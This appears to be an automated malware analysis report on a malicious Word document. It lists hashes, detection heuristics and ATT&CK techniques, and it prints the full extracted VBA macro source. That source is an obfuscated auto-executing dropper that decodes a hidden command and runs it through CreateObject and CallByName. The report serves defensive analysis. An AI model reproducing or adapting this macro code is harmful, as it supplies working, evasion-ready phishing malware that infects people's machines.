Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 10281a188a26dbb1…

MALICIOUS

Office (OLE)

79.0 KB Created: 2018-03-22 11:47:00 Authoring application: Microsoft Office Word First seen: 2019-02-26
MD5: 2128689698b9a7e496b20bac4ddd42b1 SHA-1: 4d6f2012d5521f240f10b53c769d250d02cd5697 SHA-256: 10281a188a26dbb10562bdc6f5467abad4b0e7fe73672b48a11fdd55819f81f3
290 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1140 Deobfuscate or Obfuscate Malicious Files or Information

The sample is a malicious Office document containing VBA macros. The 'AutOOpen' macro is designed to execute automatically when the document is opened, and the 'SE_ENABLE_LURE' heuristic indicates the document prompts the user to enable macros. The VBA code appears to be obfuscated, but the presence of 'CreateObject' and 'CallByName' suggests it's attempting to execute code, likely to download and run a secondary payload. The ClamAV detection 'Doc.Dropper.Agent-6481603-0' further supports its nature as a dropper.

Heuristics 10

  • ClamAV: Doc.Dropper.Agent-6481603-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6481603-0
  • Heap-spray pattern detected high SC_HEAP_SPRAY
    Repeated 0x04 bytes found
    Disassembly
    Attempted x86 opcode disassembly
    000016C6  0404              add al, 4
    000016C8  0404              add al, 4
    000016CA  0404              add al, 4
    000016CC  0404              add al, 4
    000016CE  0404              add al, 4
    000016D0  0404              add al, 4
    000016D2  0404              add al, 4
    000016D4  0404              add al, 4
    000016D6  0404              add al, 4
    000016D8  0404              add al, 4
    000016DA  0404              add al, 4
    000016DC  0404              add al, 4
    000016DE  0404              add al, 4
    000016E0  0404              add al, 4
    000016E2  0404              add al, 4
    000016E4  0404              add al, 4
    000016E6  0404              add al, 4
    000016E8  0404              add al, 4
    000016EA  0404              add al, 4
    000016EC  0404              add al, 4
    000016EE  0404              add al, 4
    000016F0  0404              add al, 4
    000016F2  0404              add al, 4
    000016F4  0404              add al, 4
    000016F6  0404              add al, 4
    000016F8  0404              add al, 4
    000016FA  0404              add al, 4
    000016FC  0404              add al, 4
    000016FE  0404              add al, 4
    00001700  0404              add al, 4
    00001702  0404              add al, 4
    00001704  0404              add al, 4
    00001706  0404              add al, 4
    00001708  0404              add al, 4
    0000170A  0404              add al, 4
    0000170C  0404              add al, 4
    0000170E  0404              add al, 4
    00001710  0404              add al, 4
    00001712  0404              add al, 4
    00001714  0404              add al, 4
    00001716  0404              add al, 4
    00001718  0404              add al, 4
    0000171A  0404              add al, 4
    0000171C  0404              add al, 4
    0000171E  0404              add al, 4
    00001720  0404              add al, 4
    00001722  0404              add al, 4
    00001724  0404              add al, 4
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Private Sub paulstorm_Change()
    Set guilecla = CreateObject(tunzhuan)
    volvos70 = 87 * 16
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
    Matched line in script
    mn1 = True
    CallByName emera777, mn, VbMethod, sitiakuloP.paulstorm, mn0, mn1
    End Sub
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Customizable = True
    Sub AutOOpen()
    pataccess
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/In document text (OLE body)
    • http://purl.org/dc/elements/1.1/In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7236 bytes
SHA-256: b425dd209cb76dcf045c9bed4a930e552a16739873f96c9d74b9f0db6b2f2c32
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutOOpen()
pataccess
pat52082 = 108 + 97
pat52082 = 93 + 13 - 73 - 8
pat52082 = 139 - 72 - 4
pat52082 = pat52082 * pat52082 * 64 + 118 * 10
End Sub

Attribute VB_Name = "anilichs"
Function tunzhuan()
tunzhuan = ssegold1976
End Function

Function ssegold1976()
ssegold1976 = green3721(avosamenA.smarailg)
End Function

Function love123123()
love123123 = avonikhsaH.melissa158
End Function

Function gasmypoa(deenheit, diedligh)
pat52082 = 108 + 97
pat52082 = 93 + 13 - 73 - 8
pat52082 = 139 - 72 - 4
pat52082 = pat52082 * pat52082 * 64 + 118 * 10
gasmypoa = green3721(sitiakuloP.yeahconnie) + deenheit + green3721(avosamenA.October100) + _
 diedligh + green3721(sitiakuloP.linkskiing + sitiakuloP.ausjurer) + diedligh
End Function

Function redskin158()
redskin158 = "u.iaoghgEmaQRQai.uipEs/l"
End Function

Function golfroyals(AVORESSAB)
pat52082 = 108 + 97
pat52082 = 93 + 13 - 73 - 8
pat52082 = 139 - 72 - 4
pat52082 = pat52082 * pat52082 * 64 + 118 * 10
golfroyals = green3721(wizard1971 + avosamenA.dreamdell) + AVORESSAB + _
green3721(avosamenA.avonayvele) + AVORESSAB + green3721(avonikhsaH.KONETEVS)
End Function

Sub sofiaaspasia(emera777)
mn = "Run"
mn0 = 0
mn1 = True
CallByName emera777, mn, VbMethod, sitiakuloP.paulstorm, mn0, mn1
End Sub

Function ANIBELAKHS()
ANIBELAKHS = sitiakuloP.loner_ru
End Function

Function green3721(pubitive)
wayact53 = ""
pat52082 = 93 + 13 - 73 - 8
pat52082 = 139 - 72 - 4
pat52082 = pat52082 * pat52082 * 64 + 118 * 10
roupier43 = Len(pubitive)
For cjverm78 = 1 To roupier43
pat52082 = 108 + 97
pat52082 = 139 - 72 - 4
pat52082 = pat52082 * pat52082 * 64 + 118 * 10
wayact53 = wayact53 + duchylau(SOUTH407(pubitive, cjverm78), 4)
Next cjverm78
pat52082 = 108 + 97
pat52082 = 93 + 13 - 73 - 8
pat52082 = 139 - 72 - 4
green3721 = wayact53
End Function

Function acTpoJIep(ziggysurf)
GHJYBWFN = robin459(9, 4) - 1
staivou5 = robin459(53, 1)
pat52082 = 108 + 97
pat52082 = 93 + 13 - 73 - 8
pat52082 = pat52082 * pat52082 * 64 + 118 * 10
love2582 = SOUTH407(love123123, staivou5)
For janearse = 2 To GHJYBWFN
staivou5 = robin459(27, 1)
pat52082 = 108 + 97
pat52082 = 139 - 72 - 4
pat52082 = pat52082 * pat52082 * 64 + 118 * 10
love2582 = love2582 + SOUTH407(ziggysurf, staivou5)
Next janearse
staivou5 = robin459(37, 1)
pat52082 = 108 + 97
pat52082 = 93 + 13 - 73 - 8
pat52082 = 139 - 72 - 4
acTpoJIep = ANIGREVOS(love2582, staivou5)
End Function






Attribute VB_Name = "avonikhsaH"
Attribute VB_Base = "0{C45A907D-3A63-4B6E-B210-20B309999378}{99CFF111-9347-474B-A9BC-83E074BC80B1}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


Private Sub pamat7007_Change()
mikefuckme = acTpoJIep(carlfaith)
wqsbsteph = acTpoJIep(carlfaith)
HCIVOKHCIRTEP = acTpoJIep(osuucoos)
insidepa = acTpoJIep(osuucoos)
kathypercy = 89 + 32
kathypercy = 124 - 2
kathypercy = 74 * 139 + 17 + 7
kathypercy = kathypercy * 143 - 7
kathypercy = 5 - 89 - 13
oker1506 mikefuckme, wqsbsteph, HCIVOKHCIRTEP, insidepa
End Sub

Attribute VB_Name = "avosamenA"
Attribute VB_Base = "0{EEA0A116-C6C3-4531-9ECA-A3C133286C9D}{50C45D01-88EA-405E-90C0-96E7AF5936EE}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False



Attribute VB_Name = "gb102456"
Function carlfaith()
carlfaith = avosamenA.canonbozo
End Function

Function osuucoos()
osuucoos = sitiakuloP.avonamsI
End Function

Sub pataccess()
Randomize
pat52082 = 108 + 97
pat52082 = 93 + 13 - 73 - 8
pat52082 = 139 - 72 - 4
pat52082 = pat52082 * pat52082 * 64 + 118 * 10
avonikhsaH.pamat7007 = "inosenig"
End Sub

Function saintbit(ftpgandalf, helpmeandy)
pat52082 = 108 + 97
pat52082 = 93 + 13 - 73 - 8
pat52082 = 139 - 72 - 4
pat52082 = pat52082 * pat52082 * 64 + 118 * 10
saintbit = green3721(avosamenA.apodpani) + helpmeandy + green3721(avosamenA.eucarevi) + _
helpmeandy + green3721(avosamenA.rubygalaxy) + ftpgandalf + _
green3721(avosamenA.hvfdbh2018 + redskin158 + avosamenA.champsshit) + ftpgandalf + green3721(avosamenA.hvfdbh2018)
End Function

Function frontrugby()
frontrugby = avonikhsaH.password34
End Function

Function duchylau(applescout As String, blade333 As Integer) As String
Dim boufulad As Integer
boufulad = 0
pat52082 = 108 + 97
pat52082 = 93 + 13 - 73 - 8
pat52082 = 139 - 72 - 4
For NELATNAP = 1 To 90
If (SOUTH407(frontrugby, NELATNAP) = applescout) Then
   boufulad = NELATNAP
   pat52082 = 108 + 97
pat52082 = 139 - 72 - 4
pat52082 = pat52082 * pat52082 * 64 + 118 * 10
    Exit For
End If
Next NELATNAP
pat52082 = 108 + 97
pat52082 = 93 + 13 - 73 - 8
pat52082 = pat52082 * pat52082 * 64 + 118 * 10
boufulad = IIf(boufulad - blade333 <= 0, 90 + boufulad - blade333, boufulad - blade333)
duchylau = SOUTH407(frontrugby, boufulad)
End Function

Function wizard1971()
wizard1971 = "smhoaiuEmaQE,uRQai.uipEs/l"
End Function

Function robin459(amuvampl, tOiRFJAxa)
pat52082 = 108 + 97
pat52082 = 93 + 13 - 73 - 8
pat52082 = 139 - 72 - 4
pat52082 = pat52082 * pat52082 * 64 + 118 * 10
robin459 = ornchlol(Int((amuvampl * Rnd()) + tOiRFJAxa))
End Function

Function ornchlol(sertnanc)
pat52082 = 108 + 97
pat52082 = 93 + 13 - 73 - 8
pat52082 = 139 - 72 - 4
pat52082 = pat52082 * pat52082 * 64 + 118 * 10
ornchlol = CInt(sertnanc)
End Function

Function oker1506(damian09, VEHSIBAK, udredboss, binkymegan)
pat52082 = 108 + 97
pat52082 = 93 + 13 - 73 - 8
pat52082 = 139 - 72 - 4
pat52082 = pat52082 * pat52082 * 64 + 118 * 10
sitiakuloP.paulstorm = gasmypoa(damian09, VEHSIBAK) + saintbit(damian09, udredboss) + golfroyals(binkymegan)
End Function

Function SOUTH407(drolterr, bullorion)
SOUTH407 = Mid(drolterr, bullorion, 1)
End Function

Function ANIGREVOS(future200, Balumba)
ANIGREVOS = future200 + SOUTH407(ANIBELAKHS, Balumba)
End Function

Attribute VB_Name = "sitiakuloP"
Attribute VB_Base = "0{B541ABA7-4ECE-4CAF-94C0-153F68C799EB}{3ADA21AA-DA0E-48BB-B83B-451C8052760B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


Private Sub CheckBox1_Click()
MsgBox "Ok"
End Sub

Private Sub CommandButton1_Click()
MsgBox "Ok"
End Sub

Private Sub Label1_Click()
MsgBox "Ok"
End Sub

Private Sub paulstorm_Change()
Set guilecla = CreateObject(tunzhuan)
volvos70 = 87 * 16
volvos70 = volvos70 - volvos7
volvos70 = 97 * 142 - 2 - 63 - 10
volvos70 = volvos70 * volvos7
sofiaaspasia guilecla
End Sub

Private Sub ToggleButton1_Click()
MsgBox "Ok"
End Sub